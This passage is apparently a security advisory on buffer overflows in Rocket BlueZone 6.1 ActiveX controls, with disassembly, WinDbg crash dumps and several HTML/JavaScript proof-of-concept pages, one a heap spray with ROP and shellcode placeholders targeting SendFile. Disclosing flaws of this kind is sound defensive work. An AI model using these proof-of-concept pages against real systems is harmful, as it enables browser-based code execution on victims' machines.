 1001E50F  68A8C00310                		push	SSZ1003C0A8_IBM_5250_Terminal
 1001E514  EB10                      		jmp	L1001E526
 1001E516                           L1001E516:
 1001E516  3C02                      		cmp	al,02h
 1001E518  7515                      		jnz	L1001E52F
 1001E51A  689CC00310                		push	SSZ1003C09C_VT_Terminal
 1001E51F  EB05                      		jmp	L1001E526
 1001E521                           L1001E521:
 1001E521  68AC4A0310                		push	SSZ10034AAC_BlueZone
 1001E526                           L1001E526:
 1001E526  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E52C                           L1001E52C:
 1001E52C  50                        		push	eax
 1001E52D  FFD6                      		call	esi
 1001E52F                           L1001E52F:
 1001E52F  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E535  50                        		push	eax
 1001E536  FF1558310310              		call	[KERNEL32.dll!lstrlenA]
 1001E53C  8BD8                      		mov	ebx,eax
 1001E53E  8B85F8FBFFFF              		mov	eax,[ebp-00000408h]
 1001E544  EB0A                      		jmp	L1001E550
 1001E546                           L1001E546:
 1001E546  8A08                      		mov	cl,[eax]               \
 1001E548  888C1DFCFEFFFF            		mov	[ebp+ebx-00000104h],cl  | <---------------- boom
 1001E54F  43                        		inc	ebx                     |
 1001E550                           L1001E550:                                  |
 1001E550  40                        		inc	eax                     |
 1001E551  40                        		inc	eax                     |
 1001E552  66833800                  		cmp	word ptr [eax],0000h    |
 1001E556  0F8574FEFFFF              		jnz	L1001E3D0              /
 1001E55C                           L1001E55C:
 1001E55C  6800010000                		push	00000100h
 1001E561  8D85FCFBFFFF              		lea	eax,[ebp-00000404h]
 1001E567  50                        		push	eax
 1001E568  6AFF                      		push	FFFFFFFFh
 1001E56A  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E570  50                        		push	eax
 1001E571  6A01                      		push	00000001h
 1001E573  6A00                      		push	00000000h
 1001E575  FF1554310310              		call	[KERNEL32.dll!MultiByteToWideChar]
 1001E57B  8D85FCFBFFFF              		lea	eax,[ebp-00000404h]
 1001E581  50                        		push	eax
 1001E582  FF15A0320310              		call	[OLEAUT32.dll!OLEAUT32.2]
 1001E588  8BF0                      		mov	esi,eax
 1001E58A  8B07                      		mov	eax,[edi]
 1001E58C  56                        		push	esi
 1001E58D  57                        		push	edi
 1001E58E  FF90B8030000              		call	[eax+000003B8h]
 1001E594  56                        		push	esi
 1001E595  FF15A8320310              		call	[OLEAUT32.dll!OLEAUT32.6]
 1001E59B  8B4DFC                    		mov	ecx,[ebp-04h]
 1001E59E  5F                        		pop	edi
 1001E59F  5E                        		pop	esi
 1001E5A0  33CD                      		xor	ecx,ebp
 1001E5A2  33C0                      		xor	eax,eax
 1001E5A4  5B                        		pop	ebx
 1001E5A5  E8A2260100                		call	SUB_L10030C4C
 1001E5AA  C9                        		leave
 1001E5AB  C20800                    		retn	0008h
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
var x = "";
for (i=0; i<13000; i++){
  x = x + "A";
}
obj.StatusBarText = x;
</script>

WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the GetOpenFilename method, see typelib:

...
/* DISPID=277 */
	/* VT_BSTR [8] */
	function GetOpenFilename(
		/* VT_VARIANT [12] [in] */ $FileFilter, <-----------------
		/* VT_VARIANT [12] [in] */ $FilterIndex,
		/* VT_VARIANT [12] [in] */ $Title,
		/* VT_VARIANT [12] [in] */ $ButtonText
		)
	{
		/* method GetOpenFilename */
	}
...

This method suffers of a stack based buffer overflow caused by an overlong FileFilter argument, this is because of a copy loop inside bzwhll.dll. See vulnerable code below.

WinDBG shows:
eax=015f0000 ebx=00000000 ecx=0000308c edx=00000041 esi=02c96d64 edi=0321f5b0
eip=031f4883 esp=015ecbf8 ebp=015ecc84 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
bzwhll!DllGetClassObject+0x18dc8:
031f4883 8810            mov     byte ptr [eax],dl          ds:0023:015f0000=4d
0:008> g
(7350.624c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015ec828 ebp=015ec848 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???
vulnerable code, see bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 100247B0                           L100247B0:
 100247B0  55                        		push	ebp
 100247B1  8DAC2404FBFFFF            		lea	ebp,[esp-000004FCh]
 100247B8  81EC7C050000              		sub	esp,0000057Ch
 100247BE  A1F4EC0410                		mov	eax,[L1004ECF4]
 100247C3  33C5                      		xor	eax,ebp
 100247C5  8985F8040000              		mov	[ebp+000004F8h],eax
 100247CB  8B8504050000              		mov	eax,[ebp+00000504h]
 100247D1  53                        		push	ebx
 100247D2  56                        		push	esi
 100247D3  57                        		push	edi
 100247D4  8945D8                    		mov	[ebp-28h],eax
 100247D7  8B8548050000              		mov	eax,[ebp+00000548h]
 100247DD  33DB                      		xor	ebx,ebx
 100247DF  6802010000                		push	00000102h
 100247E4  8945DC                    		mov	[ebp-24h],eax
 100247E7  8D85F6030000              		lea	eax,[ebp+000003F6h]
 100247ED  53                        		push	ebx
 100247EE  50                        		push	eax
 100247EF  66899DF4030000            		mov	[ebp+000003F4h],bx
 100247F6  E891C40000                		call	jmp_MSVCR80.dll!memset
 100247FB  BED8DB0310                		mov	esi,SSZ1003DBD8_All_Files
 10024800  8DBDF0020000              		lea	edi,[ebp+000002F0h]
 10024806  A5                        		movsd
 10024807  A5                        		movsd
 10024808  A5                        		movsd
 10024809  68F4000000                		push	000000F4h
 1002480E  8D8500030000              		lea	eax,[ebp+00000300h]
 10024814  53                        		push	ebx
 10024815  50                        		push	eax
 10024816  895DE0                    		mov	[ebp-20h],ebx
 10024819  A5                        		movsd
 1002481A  E86DC40000                		call	jmp_MSVCR80.dll!memset
 1002481F  6802010000                		push	00000102h
 10024824  8D85EE010000              		lea	eax,[ebp+000001EEh]
 1002482A  53                        		push	ebx
 1002482B  50                        		push	eax
 1002482C  66899DEC010000            		mov	[ebp+000001ECh],bx
 10024833  E854C40000                		call	jmp_MSVCR80.dll!memset
 10024838  83C424                    		add	esp,00000024h
 1002483B  68E8DB0310                		push	SSZ1003DBE8_Open
 10024840  BFB0F50410                		mov	edi,L1004F5B0
 10024845  57                        		push	edi
 10024846  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 1002484C  6683BD080500000A          		cmp	word ptr [ebp+00000508h],000Ah
 10024854  7440                      		jz 	L10024896
 10024856  66399D08050000            		cmp	[ebp+00000508h],bx
 1002485D  7437                      		jz 	L10024896
 1002485F  8D8508050000              		lea	eax,[ebp+00000508h]
 10024865  50                        		push	eax
 10024866  E8CCEDFEFF                		call	SUB_L10013637
 1002486B  59                        		pop	ecx
 1002486C  8945D4                    		mov	[ebp-2Ch],eax
 1002486F  33C9                      		xor	ecx,ecx
 10024871                           L10024871:
 10024871  8B45D4                    		mov	eax,[ebp-2Ch]            \
 10024874  8D3448                    		lea	esi,[eax+ecx*2]           |
 10024877  8A16                      		mov	dl,[esi]                  |
 10024879  80FA2C                    		cmp	dl,2Ch                    |
 1002487C  8D840DF0020000            		lea	eax,[ebp+ecx+000002F0h]   |
 10024883  8810                      		mov	[eax],dl                  | <---------- boom
 10024885  7502                      		jnz	L10024889                 |
 10024887  8818                      		mov	[eax],bl                  |
 10024889                           L10024889:                                    |
 10024889  41                        		inc	ecx                       |
 1002488A  66391E                    		cmp	[esi],bx                  |
 1002488D  75E2                      		jnz	L10024871                /
 1002488F  889C0DF1020000            		mov	[ebp+ecx+000002F1h],bl
 10024896                           L10024896:
 10024896  6683BD180500000A          		cmp	word ptr [ebp+00000518h],000Ah
 1002489E  7413                      		jz 	L100248B3
 100248A0  66399D18050000            		cmp	[ebp+00000518h],bx
 100248A7  740A                      		jz 	L100248B3
 100248A9  0FB68520050000            		movzx	eax,[ebp+00000520h]
 100248B0  8945E0                    		mov	[ebp-20h],eax
 100248B3                           L100248B3:
 100248B3  BE04010000                		mov	esi,00000104h
 100248B8  56                        		push	esi
 100248B9  8D85EC010000              		lea	eax,[ebp+000001ECh]
 100248BF  50                        		push	eax
 100248C0  8D8528050000              		lea	eax,[ebp+00000528h]
 100248C6  50                        		push	eax
 100248C7  E807EEFEFF                		call	SUB_L100136D3
 100248CC  56                        		push	esi
 100248CD  8D8538050000              		lea	eax,[ebp+00000538h]
 100248D3  57                        		push	edi
 100248D4  50                        		push	eax
 100248D5  E8F9EDFEFF                		call	SUB_L100136D3
 100248DA  83C418                    		add	esp,00000018h
 100248DD  8D45CC                    		lea	eax,[ebp-34h]
 100248E0  50                        		push	eax
 100248E1  C745CC08000000            		mov	dword ptr [ebp-34h],00000008h
 100248E8  C745D0FF020000            		mov	dword ptr [ebp-30h],000002FFh
 100248EF  FF1550300310              		call	[COMCTL32.dll!InitCommonControlsEx]
 100248F5  6A4C                      		push	0000004Ch
 100248F7  5F                        		pop	edi
 100248F8  57                        		push	edi
 100248F9  8D4580                    		lea	eax,[ebp-80h]
 100248FC  53                        		push	ebx
 100248FD  50                        		push	eax
 100248FE  E889C30000                		call	jmp_MSVCR80.dll!memset
 10024903  8B45D8                    		mov	eax,[ebp-28h]
 10024906  8B806B560000              		mov	eax,[eax+0000566Bh]
 1002490C  894584                    		mov	[ebp-7Ch],eax
 1002490F  8D85F0020000              		lea	eax,[ebp+000002F0h]
 10024915  89458C                    		mov	[ebp-74h],eax
 10024918  8B45E0                    		mov	eax,[ebp-20h]
 1002491B  894598                    		mov	[ebp-68h],eax
 1002491E  8D85F4030000              		lea	eax,[ebp+000003F4h]
 10024924  89459C                    		mov	[ebp-64h],eax
 10024927  8D85EC010000              		lea	eax,[ebp+000001ECh]
 1002492D  8945B0                    		mov	[ebp-50h],eax
 10024930  83C40C                    		add	esp,0000000Ch
 10024933  8D4580                    		lea	eax,[ebp-80h]
 10024936  50                        		push	eax
 10024937  897D80                    		mov	[ebp-80h],edi
 1002493A  895D88                    		mov	[ebp-78h],ebx
 1002493D  895D90                    		mov	[ebp-70h],ebx
 10024940  895D94                    		mov	[ebp-6Ch],ebx
 10024943  8975A0                    		mov	[ebp-60h],esi
 10024946  895DA4                    		mov	[ebp-5Ch],ebx
 10024949  895DA8                    		mov	[ebp-58h],ebx
 1002494C  895DAC                    		mov	[ebp-54h],ebx
 1002494F  C745B420100800            		mov	dword ptr [ebp-4Ch],00081020h
 10024956  895DBC                    		mov	[ebp-44h],ebx
 10024959  895DC0                    		mov	[ebp-40h],ebx
 1002495C  C745C44E450210            		mov	dword ptr [ebp-3Ch],L1002454E
 10024963  895DC8                    		mov	[ebp-38h],ebx
 10024966  FF15E4330310              		call	[comdlg32.dll!GetOpenFileNameA]
 1002496C  85C0                      		test	eax,eax
 1002496E  7506                      		jnz	L10024976
 10024970  889DF4030000              		mov	[ebp+000003F4h],bl
 10024976                           L10024976:
 10024976  56                        		push	esi
 10024977  8D45E4                    		lea	eax,[ebp-1Ch]
 1002497A  50                        		push	eax
 1002497B  6AFF                      		push	FFFFFFFFh
 1002497D  8D85F4030000              		lea	eax,[ebp+000003F4h]
 10024983  50                        		push	eax
 10024984  6A01                      		push	00000001h
 10024986  53                        		push	ebx
 10024987  FF1554310310              		call	[KERNEL32.dll!MultiByteToWideChar]
 1002498D  8D45E4                    		lea	eax,[ebp-1Ch]
 10024990  50                        		push	eax
 10024991  FF15A0320310              		call	[OLEAUT32.dll!OLEAUT32.2]
 10024997  8B4DDC                    		mov	ecx,[ebp-24h]
 1002499A  8901                      		mov	[ecx],eax
 1002499C  8B8DF8040000              		mov	ecx,[ebp+000004F8h]
 100249A2  5F                        		pop	edi
 100249A3  5E                        		pop	esi
 100249A4  33CD                      		xor	ecx,ebp
 100249A6  33C0                      		xor	eax,eax
 100249A8  5B                        		pop	ebx
 100249A9  E89EC20000                		call	SUB_L10030C4C
 100249AE  81C5FC040000              		add	ebp,000004FCh
 100249B4  C9                        		leave
 100249B5  C24800                    		retn	0048h
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
var x = "";
for (i=0; i<13000; i++){
    x = x + "A";
}
obj.GetOpenFilename(x,"","","");
</script>

WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the GetSaveAsFilename() method, see typelib:

...
/* DISPID=276 */
	/* VT_BSTR [8] */
	function GetSaveAsFilename(
		/* VT_VARIANT [12] [in] */ $InitialFilename,
		/* VT_VARIANT [12] [in] */ $FileFilter,  <----------------------
		/* VT_VARIANT [12] [in] */ $FilterIndex,
		/* VT_VARIANT [12] [in] */ $Title,
		/* VT_VARIANT [12] [in] */ $ButtonText
		)
	{
		/* method GetSaveAsFilename */
	}
...

This function suffers of a stack based buffer overflow in the second argument due to a copy loop inside bzwhll.dll, see vulnerable code below.

WinDbg shows:
(eec.fd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=015f0000 ebx=00000000 ecx=0000309c edx=00000041 esi=00000104 edi=0324f5b0
eip=0322467d esp=015ecbe4 ebp=015ecc70 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
bzwhll!DllGetClassObject+0x18bc2:
0322467d 8810            mov     byte ptr [eax],dl          ds:0023:015f0000=4d
0:008> g
(eec.fd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015ec814 ebp=015ec834 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???
SEH pointers are overwritten, allowing to take control of EIP.
vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 1002458B                           L1002458B:
 1002458B  55                       		db	55h;   'U'
 1002458C  8D                       		db	8Dh;   '?'
 1002458D  AC                       		db	ACh;   '¿'
 1002458E  24                       		db	24h;   '$'
 1002458F  00                       		db	00h;
 10024590  FB                       		db	FBh;   'ë'
 10024591  FF                       		db	FFh;   'ï'
 10024592  FF                       		db	FFh;   'ï'
 10024593  81                       		db	81h;   '?'
 10024594  EC                       		db	ECh;   '¬'
 10024595  80                       		db	80h;   '?'
 10024596  05                       		db	05h;
 10024597  00                       		db	00h;
 10024598  00                       		db	00h;
 10024599  A1                       		db	A1h;   'ö'
 1002459A  F4EC0410                 		dd	L1004ECF4
 1002459E  33                       		db	33h;   '3'
 1002459F  C5                       		db	C5h;   '…'
 100245A0  89                       		db	89h;   '%'
 100245A1  85                       		db	85h;   ':'
 100245A2  FC                       		db	FCh;   'ì'
 100245A3  04                       		db	04h;
 100245A4  00                       		db	00h;
 100245A5  00                       		db	00h;
 100245A6  8B                       		db	8Bh;   '<'
 100245A7  85                       		db	85h;   ':'
 100245A8  08                       		db	08h;
 100245A9  05                       		db	05h;
 100245AA  00                       		db	00h;
 100245AB  00                       		db	00h;
 100245AC  53                        		push	ebx
 100245AD  56                        		push	esi
 100245AE  57                        		push	edi
 100245AF  8945D8                    		mov	[ebp-28h],eax
 100245B2  8B855C050000              		mov	eax,[ebp+0000055Ch]
 100245B8  33DB                      		xor	ebx,ebx
 100245BA  6802010000                		push	00000102h
 100245BF  8945E0                    		mov	[ebp-20h],eax
 100245C2  8D85FA030000              		lea	eax,[ebp+000003FAh]
 100245C8  53                        		push	ebx
 100245C9  50                        		push	eax
 100245CA  66899DF8030000            		mov	[ebp+000003F8h],bx
 100245D1  E8B6C60000                		call	jmp_MSVCR80.dll!memset
 100245D6  BED8DB0310                		mov	esi,SSZ1003DBD8_All_Files
 100245DB  8DBDF4020000              		lea	edi,[ebp+000002F4h]
 100245E1  A5                        		movsd
 100245E2  A5                        		movsd
 100245E3  A5                        		movsd
 100245E4  68F4000000                		push	000000F4h
 100245E9  8D8504030000              		lea	eax,[ebp+00000304h]
 100245EF  53                        		push	ebx
 100245F0  50                        		push	eax
 100245F1  895DE4                    		mov	[ebp-1Ch],ebx
 100245F4  A5                        		movsd
 100245F5  E892C60000                		call	jmp_MSVCR80.dll!memset
 100245FA  6802010000                		push	00000102h
 100245FF  8D85F2010000              		lea	eax,[ebp+000001F2h]
 10024605  53                        		push	ebx
 10024606  50                        		push	eax
 10024607  66899DF0010000            		mov	[ebp+000001F0h],bx
 1002460E  E879C60000                		call	jmp_MSVCR80.dll!memset
 10024613  83C424                    		add	esp,00000024h
 10024616  68D0DB0310                		push	SSZ1003DBD0_Save
 1002461B  BFB0F50410                		mov	edi,L1004F5B0
 10024620  57                        		push	edi
 10024621  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 10024627  BE04010000                		mov	esi,00000104h
 1002462C  56                        		push	esi
 1002462D  8D85F8030000              		lea	eax,[ebp+000003F8h]
 10024633  50                        		push	eax
 10024634  8D850C050000              		lea	eax,[ebp+0000050Ch]
 1002463A  50                        		push	eax
 1002463B  E893F0FEFF                		call	SUB_L100136D3
 10024640  83C40C                    		add	esp,0000000Ch
 10024643  6683BD1C0500000A          		cmp	word ptr [ebp+0000051Ch],000Ah
 1002464B  7446                      		jz 	L10024693
 1002464D  66399D1C050000            		cmp	[ebp+0000051Ch],bx
 10024654  743D                      		jz 	L10024693
 10024656  8D851C050000              		lea	eax,[ebp+0000051Ch]
 1002465C  50                        		push	eax
 1002465D  E8D5EFFEFF                		call	SUB_L10013637
 10024662  59                        		pop	ecx
 10024663  8945DC                    		mov	[ebp-24h],eax
 10024666  33C9                      		xor	ecx,ecx
 10024668                           L10024668:
 10024668  8B45DC                    		mov	eax,[ebp-24h]             \
 1002466B  8D0448                    		lea	eax,[eax+ecx*2]            |
 1002466E  8A10                      		mov	dl,[eax]                   |
 10024670  80FA2C                    		cmp	dl,2Ch                     |
 10024673  8945D4                    		mov	[ebp-2Ch],eax              |
 10024676  8D840DF4020000            		lea	eax,[ebp+ecx+000002F4h]    |
 1002467D  8810                      		mov	[eax],dl                   | <--------- crash
 1002467F  7502                      		jnz	L10024683                  |
 10024681  8818                      		mov	[eax],bl                   |
 10024683                           L10024683:                                     |
 10024683  8B45D4                    		mov	eax,[ebp-2Ch]              |
 10024686  41                        		inc	ecx                        |
 10024687  663918                    		cmp	[eax],bx                   |
 1002468A  75DC                      		jnz	L10024668                 /
 1002468C  889C0DF5020000            		mov	[ebp+ecx+000002F5h],bl
 10024693                           L10024693:
 10024693  6683BD2C0500000A          		cmp	word ptr [ebp+0000052Ch],000Ah
 1002469B  7413                      		jz 	L100246B0
 1002469D  66399D2C050000            		cmp	[ebp+0000052Ch],bx
 100246A4  740A                      		jz 	L100246B0
 100246A6  0FB68534050000            		movzx	eax,[ebp+00000534h]
 100246AD  8945E4                    		mov	[ebp-1Ch],eax
 100246B0                           L100246B0:
 100246B0  56                        		push	esi
 100246B1  8D85F0010000              		lea	eax,[ebp+000001F0h]
 100246B7  50                        		push	eax
 100246B8  8D853C050000              		lea	eax,[ebp+0000053Ch]
 100246BE  50                        		push	eax
 100246BF  E80FF0FEFF                		call	SUB_L100136D3
 100246C4  56                        		push	esi
 100246C5  8D854C050000              		lea	eax,[ebp+0000054Ch]
 100246CB  57                        		push	edi
 100246CC  50                        		push	eax
 100246CD  E801F0FEFF                		call	SUB_L100136D3
 100246D2  83C418                    		add	esp,00000018h
 100246D5  8D45CC                    		lea	eax,[ebp-34h]
 100246D8  50                        		push	eax
 100246D9  C745CC08000000            		mov	dword ptr [ebp-34h],00000008h
 100246E0  C745D0FF020000            		mov	dword ptr [ebp-30h],000002FFh
 100246E7  FF1550300310              		call	[COMCTL32.dll!InitCommonControlsEx]
 100246ED  6A4C                      		push	0000004Ch
 100246EF  5F                        		pop	edi
 100246F0  57                        		push	edi
 100246F1  8D4580                    		lea	eax,[ebp-80h]
 100246F4  53                        		push	ebx
 100246F5  50                        		push	eax
 100246F6  E891C50000                		call	jmp_MSVCR80.dll!memset
 100246FB  8B45D8                    		mov	eax,[ebp-28h]
 100246FE  8B806B560000              		mov	eax,[eax+0000566Bh]
 10024704  894584                    		mov	[ebp-7Ch],eax
 10024707  8D85F4020000              		lea	eax,[ebp+000002F4h]
 1002470D  89458C                    		mov	[ebp-74h],eax
 10024710  8B45E4                    		mov	eax,[ebp-1Ch]
 10024713  894598                    		mov	[ebp-68h],eax
 10024716  8D85F8030000              		lea	eax,[ebp+000003F8h]
 1002471C  89459C                    		mov	[ebp-64h],eax
 1002471F  8D85F0010000              		lea	eax,[ebp+000001F0h]
 10024725  8945B0                    		mov	[ebp-50h],eax
 10024728  83C40C                    		add	esp,0000000Ch
 1002472B  8D4580                    		lea	eax,[ebp-80h]
 1002472E  50                        		push	eax
 1002472F  897D80                    		mov	[ebp-80h],edi
 10024732  895D88                    		mov	[ebp-78h],ebx
 10024735  895D90                    		mov	[ebp-70h],ebx
 10024738  895D94                    		mov	[ebp-6Ch],ebx
 1002473B  8975A0                    		mov	[ebp-60h],esi
 1002473E  895DA4                    		mov	[ebp-5Ch],ebx
 10024741  895DA8                    		mov	[ebp-58h],ebx
 10024744  895DAC                    		mov	[ebp-54h],ebx
 10024747  C745B420000900            		mov	dword ptr [ebp-4Ch],00090020h
 1002474E  895DBC                    		mov	[ebp-44h],ebx
 10024751  895DC0                    		mov	[ebp-40h],ebx
 10024754  C745C44E450210            		mov	dword ptr [ebp-3Ch],L1002454E
 1002475B  895DC8                    		mov	[ebp-38h],ebx
 1002475E  FF15E0330310              		call	[comdlg32.dll!GetSaveFileNameA]
 10024764  85C0                      		test	eax,eax
 10024766  7506                      		jnz	L1002476E
 10024768  889DF8030000              		mov	[ebp+000003F8h],bl
 1002476E                           L1002476E:
 1002476E  56                        		push	esi
 1002476F  8D45E8                    		lea	eax,[ebp-18h]
 10024772  50                        		push	eax
 10024773  6AFF                      		push	FFFFFFFFh
 10024775  8D85F8030000              		lea	eax,[ebp+000003F8h]
 1002477B  50                        		push	eax
 1002477C  6A01                      		push	00000001h
 1002477E  53                        		push	ebx
 1002477F  FF1554310310              		call	[KERNEL32.dll!MultiByteToWideChar]
 10024785  8D45E8                    		lea	eax,[ebp-18h]
 10024788  50                        		push	eax
 10024789  FF15A0320310              		call	[OLEAUT32.dll!OLEAUT32.2]
 1002478F  8B4DE0                    		mov	ecx,[ebp-20h]
 10024792  8901                      		mov	[ecx],eax
 10024794  8B8DFC040000              		mov	ecx,[ebp+000004FCh]
 1002479A  5F                        		pop	edi
 1002479B  5E                        		pop	esi
 1002479C  33CD                      		xor	ecx,ebp
 1002479E  33C0                      		xor	eax,eax
 100247A0  5B                        		pop	ebx
 100247A1  E8A6C40000                		call	SUB_L10030C4C
 100247A6  81C500050000              		add	ebp,00000500h
 100247AC  C9                        		leave
 100247AD  C25800                    		retn	0058h
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
var x = "";
for (i=0; i<13000; i++){
    x = x + "A";
}
obj.GetSaveAsFilename("",x,"","","");
</script>

LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): True
description: LIPI Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the SendFile() method, see typelib:

...
/* DISPID=2 */
	/* VT_I4 [3] */
	function SendFile(
		/* VT_BSTR [8] [in] */ $__MIDL_0014, <------------------------------
		/* VT_BSTR [8] [in] */ $__MIDL_0015
		)
	{
		/* method SendFile */
	}
...

This method suffers of a heap buffer overflow in the first argument because of an dangerous call to a strcat-like function inside bzlipiobj.dll, see vulnerable code below.
Note that you need to set ‘Username’ and ‘Password’ properties to avoid a login input box.
When browsing sendfile.html, WinDBG shows:

eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c
eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
<Unloaded_ring.dll>+0xc0c0bfb:
0c0c0c0c 0c0c            or      al,0Ch
vulnerable code, bzlipiobj.dll:
;-------------------------------------------------------------------------------
 100200E0  8D8510040000              		lea	eax,[ebp+00000410h]
 100200E6                           L100200E6:
 100200E6  50                        		push	eax
 100200E7  8D83E28E0800              		lea	eax,[ebx+00088EE2h]
 100200ED  50                        		push	eax
 100200EE  FF15F8610210              		call	[KERNEL32.dll!lstrcatA]
 100200F4  EB75                      		jmp	L1002016B
;-------------------------------------------------------------------------------

to reach the call browse sendfile_crash.html, a login box is showed. Set a breakpoint in memory to KERNEL32.dll!lstrcatA, click OK.
Proof of Concept

<html>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<script>
//obj.UserName = "aaaaaaaa";
//obj.Password = "bbbbbbbb";
bof = "";
for (i=0; i<15000; i++){
   bof = bof + "!!!!";
}
obj.SendFile(bof,"");
</script>
<html>
<body>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<div id=blah></div>
<script>
        var div_container = document.getElementById("blah");
        div_container.style.cssText = "display:none";
        var data;
        offset = 0x100;
        junk = unescape("%u0c0c%u0c0c");
        while (junk.length < 0x1000) junk += junk;
        rop = unescape("%u4141%u4141");
        shellcode = unescape("%u4141%u4141");
        data = junk.substring(0,offset) + rop + shellcode
        data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x600; i++)
        {
                var x = document.createElement("button");
                x.title = data.substring(0,0x40000-0x58);
                div_container.appendChild(x);
        }
obj.UserName = "aaaaaaaa";
obj.Password = "bbbbbbbb";
bof = "";
for (i=0; i<15000; i++){
   bof = bof + "!!!!";
}
obj.SendFile(bof,"");
</script>

LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): True
description: LIPI Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the ReceiveFile() method, see typelib:

...
/* DISPID=1 */
	/* VT_I4 [3] */
	function ReceiveFile(
		/* VT_BSTR [8] [in] */ $__MIDL_0011,
		/* VT_BSTR [8] [in] */ $__MIDL_0012
		)
	{
		/* method ReceiveFile */
	}
...

This method suffers of a heap buffer overflow in the first argument because of an dangerous call to a strcat-like function inside bzlipiobj.dll, see vulnerable code below.
Note that you need to set ‘Username’ and ‘Password’ properties to avoid a login input box.
When browsing receivefile.html, WinDBG shows:

eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c
eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
<Unloaded_ring.dll>+0xc0c0bfb:
0c0c0c0c 0c0c            or      al,0Ch
vulnerable code, bzlipiobj.dll:
 1001F94D  8D8510040000              		lea	eax,[ebp+00000410h]
 1001F953                           L1001F953:
 1001F953  50                        		push	eax
 1001F954  8D83E28E0800              		lea	eax,[ebx+00088EE2h]
 1001F95A  50                        		push	eax
